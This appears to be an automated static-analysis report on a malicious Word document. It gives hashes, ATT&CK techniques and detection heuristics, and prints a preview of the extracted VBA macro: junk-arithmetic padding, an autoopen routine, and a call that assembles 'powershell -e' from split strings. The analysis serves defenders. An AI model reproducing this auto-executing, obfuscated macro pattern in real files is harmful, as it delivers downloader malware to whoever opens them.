Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1da577cc36113f34…

MALICIOUS

Office (OLE)

Size: 252.4 KB
Created: 2019-03-14 06:50:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: efa88d9f4746fda26d94ea3a7dd4289b
SHA-1: eb0324b8f52a65ddcbf98acf0047be2602f03d8c
SHA-256: 1da577cc36113f342fb1d47d9f75056ca7792c1cc40aa38be150f4554c0cdf65
Risk score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros. Heuristics indicate an AutoOpen macro that calls GetObject and reassembles API names such as 'Win32_Process' from split string literals, strongly suggesting an intent to execute code. The macro's size and obfuscation point towards downloader or dropper functionality, likely used to initiate further malicious activity.

Heuristics (8)

  • ClamAV: Doc.Malware.00536d-6894470-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6894470-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code.
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) that appears in no single literal. Splitting an API name across string concatenation serves only to evade keyword scanning.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro (runs automatically when the document is opened).
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call (commonly used to obtain a COM or WMI object reference, e.g. Win32_Process).
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents and source-extraction failures, where the visible macro source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body; a standard DrawingML schema namespace, expected in Office files)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 67078 bytes
SHA-256: 9055e867a1de8fddbddb130c5a3c6053270f0e5e994dc5ee11ff7b05490a81f5

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ZcB1BAx"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function jAwoACUk()
   If KBX4x_ = bcZUAD Then
         SAQGAZAA = 251495408 * tCQcBA
         fxAAXxcX = fUkxZk1 - 773187183 + 171917073 + jBDCAQAA * 997993050 / 933254988 + 238240702 / Chr(266518125 / CSng(521044337 + Round(vUDGA1ow))) + 636867536 * Log(sAGGAc) - 395885097 - 129980176 + EcB_AA1 * CLng(X4cAXoU - Atn(UAAUBAG / 812800627 / 66024360 + MoUk_A))
         KxB4QAA = 432346466 * ZAUZAAkD
End If
   If Y1ZA4A = nXGAAAA Then
         KAAACwc = 726806180 * iQABQ4DA
         GBB_A1 = JAGAAwA - 662128201 + 756629855 + EQAZkAA * 133594769 / 360661186 + 923123443 / Chr(565201370 / CSng(241582482 + Round(TAABDBA1))) + 496679324 * Log(L4AUAkB) - 632817401 - 724585995 + LDAUAXB * CLng(aZwDoAA - Atn(tQADAA_4 / 736884531 / 312375886 + fA1BkBAC))
         kCCBUDU = 505611138 * XABAZo
End If
   If pCXCGCc = SQQkACUC Then
         ZZAQ_A = 794610314 * CUcA4c
         lADDDU4 = EGAwck - 554177396 + 112952478 + wUAAo1 * 882426766 / 6555115 + 460006087 / Chr(355666877 / CSng(540808697 + Round(oZcAXc))) + 410508735 * Log(EAwkXA) - 57843043 - 296043713 + ICUAcU * CLng(KUADZAQG - Atn(KUAxAA / 327912337 / 288101918 + FcCAAUQA))
         wZUAwDD = 985382277 * iQXADA
End If
   If wA_BU_ = qAZBABA4 Then
         QAAD_Xw = 543965888 * CBBXUUA
         tAoUDB = j1QAAAB_ - 966514009 + 178696511 + NDBADB * 983338421 / 349882712 + 313401595 / Chr(439288671 / CSng(520297826 + Round(WA4ACAQ))) + 275219720 * Log(NZ1AUxU) - 435929066 - 211429438 + vZoA4wB * CLng(MQkQoXC - Atn(WAABB4 / 945765656 / 788573318 + S4x1BxQ))
         ADQGAo1Z = 370238960 * MAGAQQ1A
End If
   If NUD4BkU = QGAAUBAA Then
         qA4Q_UC = 605618704 * iZDwAAAA
         R4_X_Xo = RAAAQQA - 655971098 + 846073621 + jQZcAB1B * 999151246 / 505425657 + 236301192 / Chr(847768466 / CSng(219216551 + Round(LAAA1B))) + 650038052 * Log(fUBBGAA) - 484466031 - 5270120 + pDZAAoA1 * CLng(VA1DAU - Atn(jAc_ADoc / 448687618 / 863245306 + nBXBDk))
         WUQDxZX = 346602123 * SQxUUCA
End If
   If LAADAk4D = LBAAUXUA Then
         AAADGB = 795559071 * wx4kAAQ4
         RDAA_AB = LAG_ADC - 159202071 + 580481539 + SAGwQQAU * 186189777 / 568384319 + 176846293 / Chr(593312438 / CSng(196091035 + Round(LGAGADA))) + 209655130 * Log(PQGQXc) - 958684800 - 252248519 + AUDBUU * CLng(AAk_AAk - Atn(u44QkCk_ / 217049160 / 963482977 + dwAUAGA4))
         CwAXGcBk = 427523637 * NAGoGoAc
End If
   If wQXZCAQ1 = vCABABw Then
         NAQxBADA = 954784072 * p4AAAC
         FAGoZoC = TxQCCA4Q - 427175429 + 491237292 + f44BBA * 320815324 / 783421636 + 126084156 / Chr(107924729 / CSng(323466373 + Round(SA4DAAAB))) + 456472900 * Log(zAoXB41_) - 969139960 - 424638556 + D1AA4QQA * CLng(KBkxXUAc - Atn(IGAQCA / 215086849 / 529055136 + AAB_QAUk))
         kAwAk1 = 56897608 * wkcwDGU
End If
End Function
Sub autoopen()
On Error Resume Next
   If IxAxcx = zwAoAAA Then
         rAQUxc = 152816794 * BAxAZQA
         pUABAA1 = jQcAcAZ - 324799790 + 448746078 + IA1AZc * 917290361 / 514165029 + 46799271 / Chr(723111709 / CSng(898833146 + Round(aAZcxxXU))) + 63868050 * Log(IQDDwUX) - 83665627 - 738517047 + nDcAAU * CLng(wQAAAA1Z - Atn(LoDUAoc / 604209687 / 560637849 + cAcAAoA))
         zQ4AUUkA = 227494141 * uoAQQAAA
End If
   If QkUZBAA = jQAAAAAc Then
         wAD4C_A = 506701640 * GxGA4UQ
         JAAQxA = uAAAAC - 147516368 + 285171672 + aAACAUA4 * 657785855 / 864470680 + 726541387 / Chr(434397226 / CSng(935619607 + Round(mowAZDQA))) + 399704516 * Log(iG1DQA) - 368291624 - 431616580 + LAQQBAA * CLng(YUAADD - Atn(m4U4AX / 641182243 / 814290178 + iADAZ4))
         jUQGCAQ = 73733816 * cAXx4UAB
End If
FkAQkGBQ (sZAUCDw + "po" + tZAZAAA + "wersh" + oADQDA + "ell -e " + PkBAA1Z + AAAAAQAU + awUAAA + uADxw_C + Z4AAAAB + EAQoBAA + sA4AAQ + zkoAxo)
   If skAAwk = mxABoXB Then
         QB_kC4Q = 913896144 
... (truncated)